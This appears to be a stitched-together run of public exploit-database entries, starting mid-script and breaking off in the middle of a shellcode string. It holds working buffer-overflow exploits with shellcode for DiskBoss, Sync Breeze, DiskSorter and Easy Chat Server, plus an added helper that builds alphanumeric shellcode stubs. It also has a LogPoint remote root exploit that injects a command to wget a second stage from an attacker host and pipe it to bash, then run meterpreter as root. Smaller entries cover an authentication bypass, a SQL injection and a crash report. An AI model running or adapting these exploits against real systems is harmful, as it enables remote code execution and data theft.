# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Sync Breeze\bin\QtGui4.dll)
jmpesp = "\x4e\x21\x1f\x65"
badchars = "\x0a\x0d" # And 0x80 to 0xff
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
junk = "C" * (239)
llamaleftovers = (
"\x54" # push ESP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
data = "A"*4108 + jmpesp + llamaleftovers + junk + buf
a.write(data)
a.close()
Source: https://bugzilla.gnome.org/show_bug.cgi?id=775120
The attached file will cause a null pointer access and segfault in the mpegts parser. Current git code, found with afl.
ASAN stack trace:
=================================================================
==32545==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe957185495 bp 0x60200002cf7a sp 0x7fe956e027a0 T2)
==32545==The signal is caused by a WRITE memory access.
==32545==Hint: address points to the zero page.
#0 0x7fe957185494 in _parse_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32
#1 0x7fe957184058 in __common_section_checks /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:166:9
#2 0x7fe95718522f in gst_mpegts_section_get_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:480:9
#3 0x7fe957438b9a in mpegts_base_apply_pat /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:942:20
#4 0x7fe957438b9a in mpegts_base_handle_psi /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1155
#5 0x7fe957437cd1 in mpegts_base_chain /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1424:11
#6 0x7fe9574341e7 in mpegts_base_loop /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1589:13
#7 0x7fe9644305c3 in gst_task_func /f/gstreamer/gstreamer/gst/gsttask.c:334:5
#8 0x7fe96362f867 (/usr/lib64/libglib-2.0.so.0+0x70867)
#9 0x7fe96362eed4 (/usr/lib64/libglib-2.0.so.0+0x6fed4)
#10 0x7fe9630ac443 in start_thread (/lib64/libpthread.so.0+0x7443)
#11 0x7fe962bdb92c in clone (/lib64/libc.so.6+0xe792c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32 in _parse_pat
Thread T2 (tsdemux0:sink) created by T1 (typefind:sink) here:
#0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
#1 0x7fe96364cadf (/usr/lib64/libglib-2.0.so.0+0x8dadf)
Thread T1 (typefind:sink) created by T0 here:
#0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
#1 0x7fe96364cadf (/usr/lib64/libglib-2.0.so.0+0x8dadf)
==32545==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42162.zip
#!/usr/bin/python
###############################################################################
# Exploit Title: DiskBoss v8.0.16 - Local Buffer Overflow
# Date: 11-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: DiskBoss v8.0.16 (Freeware, Pro and Ultimate)
# Vendor Homepage: http://www.disksorter.com/
# Version: 8.0.16
# Software Link: http://www.diskboss.com/downloads.html (Freeware, Pro and Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input Directory" and paste the content of exploit.txt
#
# Only difference between this one and 42157 is that EBX is used
#
# Note: No typos!!11!
#
##############################################################################
a = open("exploit.txt", "w")
# Message= 0x65182c15 : jmp ebx | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\DiskBoss\bin\QtGui4.dll)
jmpebx = "\x15\x2c\x18\x65" # Why JMP EBX? Buffer at ESP is split, bad!
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
llamaleftovers = (
"\x53" # push EBX
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBX + 233, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x53\x5b" * 119 + "\x53"
data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4) + llamaleftovers + junk + buf
a.write(data)
a.close()
# Exploit Title: EFS Web Server 7.2 Authentication Bypass
# Date: 11-06-2017
# Software Link: http://www.sharing-file.com/efssetup.exe
# Software Version : 7.2
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
######## Description ########
<!--
What is Easy File Sharing Web Server 7.2 ?
Easy File Sharing Web Server is a file sharing software that allows
visitors to upload/download files easily through a Web Browser. It can help
you share files with your friends and colleagues. They can download files
from your computer or upload files from theirs. They will not be required to
install this software or any other software because an internet browser is
enough. Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum.
The Secure Edition adds support for SSL encryption that helps protect
businesses against site spoofing and data corruption.
-->
######## Video PoC and Article ########
https://www.youtube.com/watch?v=XlTH7Fm1m1w
http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/
######## Attack Description ########
<!--
Note: no need to log in, because this is an authentication bypass vulnerability.
==>START<==
Any visitor can bypass the login screen by simply changing the URL and browsing the
drives.
-->
######## Proof of Concept ########
When we visit the EFS web server it prompts for login; the attacker just
changes the URL to the one below.
Exploit:
http://192.168.1.14/disk_c/
To switch drives, change /disk_c to /disk_<drive letter>,
for example /disk_d or /disk_f.
=============================================
NOTE:
Now we have permission to view drives and folders and download files on
different drives or in different folders.
============================================
_____ ___ _ _ _ _ ___ ____
|_ _/ _ \| | | | | | |_ _| _ \
| || | | | | | | |_| || || | | |
| || |_| | |_| | _ || || |_| |
|_| \___/ \___/|_| |_|___|____/
Touhid Shaikh.......
# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
# Date: 11/06/17
# Exploit Author: agix
# Vendor Homepage: https://www.logpoint.com
# Version: logpoint < 5.6.4
# Tested on: 5.6.2
# Vendor contact 19/04
# Exploit details sent to the vendor 24/04
# Patch in test mode 05/05
# Patch release to public 08/05
# run "python -m SimpleHTTPServer" on the attacker host to serve the second stage of the exploit from a file named e
# the second stage (file e), which gives root code execution, is the following one-liner:
# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
# it downloads a third stage (meterpreter) and runs it as root through the sudo-able root_actions helper
import time
import zmq
import sys
import json
import random
import string
import base64
ATTACKER_IP = '172.16.171.1'
LOGPOINT_IP = '172.16.171.204'
def crash():
    context = zmq.Context()
    sock = context.socket(zmq.DEALER)
    sock.connect("tcp://%s:5504" % LOGPOINT_IP)
    sock.send('crash')
crash()
time.sleep(1)
context = zmq.Context()
sock2 = context.socket(zmq.DEALER)
sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
cmd2 = base64.b64encode('cat /tmp/e')
exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
time.sleep(30)
# cleaning
tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
#!/usr/bin/python
###############################################################################
# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
# Date: 10-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: DiskSorter v9.7.14
# Vendor Homepage: http://www.disksorter.com/
# Version: 9.7.14
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Tested On: Windows XP SP3
#
# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
#
# Credit to n3ckD_ for discovering the DoS exploit
#
# Challenges to convert this DoS to code execution:
# 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish)
# 2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c
# 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
#
# +----------------------------------+
# |1 custom shellcode == 1 dead llama|
# +----------------------------------+
#
##############################################################################
a = open("exploit.txt", "w")
# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad!
llamaleftovers = (
"\x55" # push EBP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 209
"\x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x55" + "\x53\x5b" * 105 # push EBP, then push/pop pairs as filler
data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()
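Both advisories above (DiskBoss at the top of this section and DiskSorter just above) hand-roll the same stub: copy a register into EAX, then reach the alphanumeric payload with three `add eax, imm32` instructions whose immediate bytes are all printable, because the msfvenom output was generated with BufferRegister=EAX and expects EAX to point at its first byte. The Python 3 helper below is added here and is not part of either advisory. It generalises that step: given a register and a byte distance it searches for immediates whose bytes avoid a forbidden set, assembles the stub, and runs it through a small interpreter to confirm where EAX ends up. The forbidden set and the printable-only choice for immediates are assumptions modelled on the bad-character notes in the advisories, and the base address and distances used at the bottom are made up for illustration.

```python
import itertools
import struct

# Bytes the two advisories could not send: CR, LF and "/" (msfvenom -b), "\" (0x5c,
# which splits the buffer) and NUL. Assumption: the rest of printable ASCII is fine
# for the immediates, as the 0x55/0x56 immediates on the page suggest.
FORBIDDEN = {0x00, 0x0a, 0x0d, 0x2f, 0x5c}
ALLOWED = [b for b in range(0x21, 0x7f) if b not in FORBIDDEN]

PUSH_POP = {"ebx": b"\x53\x58", "ebp": b"\x55\x58"}   # push reg ; pop eax
ADD_EAX_IMM32 = 0x05                                  # add eax, imm32 (the opcode byte itself is 0x05)

# The stub exactly as it appears in the DiskBoss advisory above.
PAGE_STUB_EBX = b"\x53\x58" + b"\x05\x55\x55\x55\x55" * 2 + b"\x05\x56\x56\x55\x55"


def split_immediates(delta, count=3, allowed=ALLOWED):
    """Return `count` 32-bit immediates whose bytes all lie in `allowed` and whose
    sum is congruent to `delta` modulo 2**32, or None if no split exists.
    Works one byte position at a time (little-endian), carrying into the next."""
    target = delta & 0xFFFFFFFF
    allowed_set = set(allowed)
    columns = [[] for _ in range(count)]
    carry = 0
    for pos in range(4):
        want = (target >> (8 * pos)) & 0xFF
        for head in itertools.product(allowed, repeat=count - 1):
            partial = sum(head) + carry
            last = (want - partial) % 256
            if last in allowed_set:
                for col, byte in zip(columns, head + (last,)):
                    col.append(byte)
                carry = (partial + last) >> 8
                break
        else:
            return None
    return [int.from_bytes(bytes(col), "little") for col in columns]


def build_stager(reg, delta, count=3):
    """push reg / pop eax / add eax, imm32 (x count) so that EAX = reg + delta."""
    imms = split_immediates(delta, count)
    if imms is None:
        raise ValueError("no %d-immediate split for delta %#x" % (count, delta))
    code = PUSH_POP[reg]
    for imm in imms:
        code += bytes([ADD_EAX_IMM32]) + struct.pack("<I", imm)
    return code


def emulate_stager(code, reg_value):
    """Interpret only the opcodes these stubs use and return the final EAX."""
    eax, stack, i = 0, [], 0
    while i < len(code):
        op = code[i]
        if op in (0x53, 0x55):                   # push ebx / push ebp
            stack.append(reg_value)
            i += 1
        elif op == 0x58:                         # pop eax
            eax = stack.pop()
            i += 1
        elif op == ADD_EAX_IMM32:                # add eax, imm32
            (imm,) = struct.unpack("<I", code[i + 1:i + 5])
            eax = (eax + imm) & 0xFFFFFFFF
            i += 5
        elif op == 0x40:                         # inc eax
            eax = (eax + 1) & 0xFFFFFFFF
            i += 1
        elif op == 0x48:                         # dec eax
            eax = (eax - 1) & 0xFFFFFFFF
            i += 1
        else:
            raise ValueError("unsupported opcode %#x at offset %d" % (op, i))
    return eax


def bad_bytes(code, forbidden=FORBIDDEN):
    """Sorted list of forbidden bytes present in `code` (empty means clean)."""
    return sorted(b for b in set(code) if b in forbidden)


if __name__ == "__main__":
    base = 0x0012F000                            # assumed register value at the jmp
    print("page stub: EAX = EBX + %d" % (emulate_stager(PAGE_STUB_EBX, base) - base))
    stub = build_stager("ebp", 229)              # e.g. stub + 211 bytes of junk in front of buf
    print(stub.hex(), "-> EBP + %d" % (emulate_stager(stub, base) - base), bad_bytes(stub))
```

The byte-wise search is what makes the split work for arbitrary distances: each position only needs the three chosen bytes plus the incoming carry to match the target byte modulo 256, and the final carry out of the top byte is discarded by the 32-bit wraparound, which is exactly the trick the page's 0x55/0x56 immediates rely on.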
# Exploit Title: [PaulShop CMS <= 2017-03-25 Sql Injection]
# Date: [10-06-2017]
# Exploit Author: [Se0pHpHack3r]
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: [2017-03-25]
1. Description
SQL Injection on the Shipping Cost page in the Cart, via the "country" and "weight" GET parameters
2. Examples
http://localhost/shop/en/cart/shipping_cost?country=[SQL INJECTION HERE]
http://localhost/shop/en/cart/shipping_cost?country=TH&weight=[SQL INJECTION HERE]
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]
# ======================================================================================================================
# The Username parameter of the registration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
# ======================================================================================================================
# USAGE: python exploit.py ip
#!/usr/bin/python
import os
import sys
import socket
ip = sys.argv[1]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))
#AlphanumericShellcode
shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
